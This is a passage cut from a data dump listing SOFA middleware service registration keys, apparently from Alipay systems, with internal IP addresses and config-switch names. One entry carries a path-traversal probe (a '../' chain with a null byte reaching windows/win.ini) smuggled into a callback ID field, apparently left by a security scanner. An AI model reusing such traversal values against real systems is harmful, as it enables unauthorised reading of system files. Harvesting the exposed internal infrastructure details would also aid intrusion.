ANCE_ID#@#SOFA.DRM","DATA_ID_11.158.27.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.ChannelServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.grid.OperationPlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.order.BizOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CILogService:1.0:ciLogLinklogService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:etetestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBSERVINDUSTRYPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.innertrans.common.service.facade.api.InnerTransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","ipsponsorprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findatacanal.common.service.manage.gildata.GdDividendSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.dataspecial.facade.MobilePaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebbatch.service.facade.api.FundPurchaseTotalInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.TestCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.UnfreezeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.promo.service.MallPromoteOrderRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.BudgetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forumactivity.api.ForumActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetcore.common.service.assetcore.zcb.facade.ZCBAssetPageListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.agentfund.api.AftransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcfrontquality@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.McisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.po.AssetPoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.196.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.securityexplore.AeTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotcmgr_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.OpsConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantShopPageQueryFacade:1.0:merchantShopPageQueryFacade-gz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_BILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ecdcc:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.poscoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.app.AppEventSubscribeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantOrderSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.adminconsole.rolebase.RoleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hpmweb.SourceMap:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.changecode.ChangeCodeBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../../../../../../../windows/win.ini\u0000en@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdExpandRecordManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.CardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.AccurateValidateService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@33024869-uniqueId-104003025.antscanner.global.alipay.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata3.schedule.rpc.service.LogicalTableInstanceService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.price.PriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.ShopManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.biztask.facade.BizTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.common.service.integration.config.ServiceClientConfigResource.indicatorCallSystemBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.96.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custprod.service.api.CardManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.openhome.MessageNotificationFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.MerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.unitestcenter.common.service.facade.api.InspectionPartnerManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodOnCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinsight.service.api.portal.CommonDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:zmmif-cache-preload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.successFixedOrderGotoneDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.ding.DingUserRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.ActivityQueryFacade4Kbt:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampGroupConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innovate.common.service.facade.user.InvUserCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:pcreditmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.packageFeeLogQuerySize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.MonthlyBillDrm.showRecommendation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfundprod.common.service.facade.test.TairTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillTransactionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherActiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.4.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppprod.common.service.facade.recharge.CzChannelRuleManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryExpansionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.loancore.common.service.facade.alipay.api.ZlcSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.control.service.MasterSlaveBudgetRemoteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.common.dal.daointerface.UkeyUserRelationDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.resource.UnifyBasicDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.CustomSenManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.reservecenter.common.service.facade.api.FundAllocateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iopenmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:insttrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.InformationSpecialFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iassetcenter.service.facade.api.query.UserAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.appx.WorkbenchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.gotone.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsEndorsementOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.136.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.smartFoProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.common.dal.util.DrmFinslipCommonControlResource.logSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:cn.mybank.fc.price.facade.PricePortalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.darwin.common.service.facade.api.ExperimentVersionAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.atd:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.astaralarm.common.service.facade.tvm.vul.VulAssetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insiopweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.instpay.api.InstpayHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftweb.facade.ReleaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.MediaAuditServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.skipAllForTestStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.goldeneye.PatekGoldenEyeTargetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cryptprod.common.service.facade.crypto.CipherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.morderprod.common.service.facade.IsvOccupyApplicationOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.32.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.libracore.common.service.facade.api.TransferPricingConsultingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.cfin.loancore.common.service.facade.cf.api.query.CfTransDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antlogmng.common.service.facade.tinyapp.TinyAppForAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.common.service.facade.api.manage.ParamSubscribeManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.orderlink.OrderLinkAdjustService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinResultDetailRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon2.common.service.facade.api.ReconGapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.closedUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.184.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.AppFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_B_WITHDRAW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.icif.service.facade.api.AgreementQueryService:1.0:agreementQueryServiceImemberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.FortuneMenuFacade:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.109.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdZFTSubMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitBudgetSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.ordermng.apaysales_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.zcache.tbase.zdatacontextTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linka.common.service.facade.command.CmdFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTSTC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.crepTrigger.CrepTriggerApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.gonganCheckFailCountStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.tradeexprod.tradeexprod_misc_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizrecon.facade.ext.ReconConfMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:finvirtualta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kbopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergwsmall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_XY_TEST0726_01#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.87.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iexclienttrdcenter.service.facade.gui.DiversionConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:overseaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:cstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.mrchselfoperation.MerchantSignupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:frdataaccess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.common.manage.facade.OnlineExecFacade:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.openeval.common.service.facade.eventsafeguard.OeHaEventSafeguardDetectTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.188.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.consumeprod.common.service.operate.openapi.client.ConsumeOperationInvokeService:1.0:pcreditauthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ChangeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.FundAnnouncementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.borrowerInfo.BorrowerInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.UCKernelUserManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.74.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.masterdata.common.service.facade.client.MdmClientQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.lend.LendApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardPmtInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.friendships.RelationManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.authcenter.service.facade.PermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.ReferDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:tradeapcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:personalprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.SlowSqlDiagThresholdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.biz.service.impl.rest.DenoiseRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.drillcenter.facade.liquid.LiquidAttackComponentFacade:1.0:fcalm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.promo.service.SceneMonitorDataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentHistoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.tag.TagMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.CommonCmdConfigDrm.modifyCmdEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcenter.common.service.facade.notice.NoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantSubService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oa_template_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ContractQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkinstassetprod.common.service.facade.api.IaInstManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:dfdtcDataTaskExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:morderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.225.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.shangshu.dtcrawlerbase.hacker.service.AntiHackerService:1.0:linux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeapRefundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.ResourceNodeRelationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.249.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_DEMO_SOFA4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditchannel.facade.bill.service.QueryBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.airprodTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.lineageHostOnRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.237.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ccmfactory.facade.data.ChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-promoorder-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zpdcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.version,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.csTaskSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcube.common.service.facade.page.ProductTemplateConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:spokesmantwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scardcenter.